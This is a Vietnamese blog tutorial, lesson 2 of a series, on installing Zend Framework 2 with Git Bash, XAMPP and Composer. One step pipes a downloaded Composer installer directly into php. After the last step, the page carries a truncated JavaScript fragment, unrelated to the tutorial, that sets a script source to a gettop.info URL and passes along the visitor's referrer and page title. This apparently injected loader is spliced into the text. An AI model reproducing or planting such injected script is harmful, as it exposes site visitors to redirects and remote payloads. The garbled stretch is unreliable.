Bài 2: Hướng dẫn chi tiết cách cài đặt Zend Framework 2.x

Ở bài 1, Iniweb đã giới thiệu cho các bạn sơ lược về Zend Framework phiên bản 2.x, các điểm mới trên Zend 2, ở bài học thứ 2 trong Series học Zend Framework 2, Iniweb sẽ hướng dẫn các bạn từng bước để cài đặt nó bằng cách phổ thông nhất đó là thông qua command line và GitBash:

  – B1: bước thứ nhất các bạn cần tải và cài đặt GitBash tại: www.git-scm.com

  – B2: Bạn cần phải cài đặt Xampp vào.

  – B3: Tạo Folder zf2  theo cấu trúc thư mục / xampp/htdocs/zf2 để chuẩn bị install cấu trúc Zend 2 vào thư mục này.

  – B4: Bật Gitbash lên truy cập vào folder zf2 vừa khởi tạo, ở đây mình cài xampp trên ổ C:/ nên mình sẽ gõ cd c: để vào ổ C, sau đó đánh tiếp dòng lệnh:

cd xampp/htdocs/zf2 để vào thư mục zf2.

Tùy theo cách cài đặt xampp của bạn mà đường dẫn sẽ khác nhau.

zend install 1

  – B5: Download thư viện mặc định của Zend 2 Framework trên Git về bằng cách gõ lệnh:

Git clone git://github.com/zendframework/ZendSkeletonApplication.git zfexam

zend install 2Tới bước này thì bạn vẫn chưa chạy được đâu nhé, vì mới nạp được bộ thư viện mặc định thôi.

  – B6: Tải và cài đặt Composer cho máy windows tại link: https://getcomposer.org/Composer-Setup.exe

  – B7: Sau đó các bạn truy cập vào thư mục Zfexam bằng command line  đánh lệnh sau:

  php -r "readfile('https://getcomposer.org/installer');" | php

zend install 3

  – B8: Bạn gõ tiếp lệnh: php composer.phar install để bắt đầu tiến trình cài đặt Zend 2 Framework (Bản mình đang cài là: Zend Framework 2.5.1)

zend install 4

Lưu ý khi cài đặt mà nó xuất hiện Hidden token thì bạn cần phải có tài khoản trên Github, sau đó vào mục Settings  -> Personal Acess Token -> Genarate new token để tạo Token sau đó copy Token nó đã tạo cho bạn paste vào sau dòng Hidden token mới tải về được nhé.

zend install 5

Sau khi đã cài xong thì bạn tiến hành chạy thử theo đường dẫn: localhost/zf2/zendexam/public

zend install 6

} else {s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Leave a Comment

Your email address will not be published. Required fields are marked *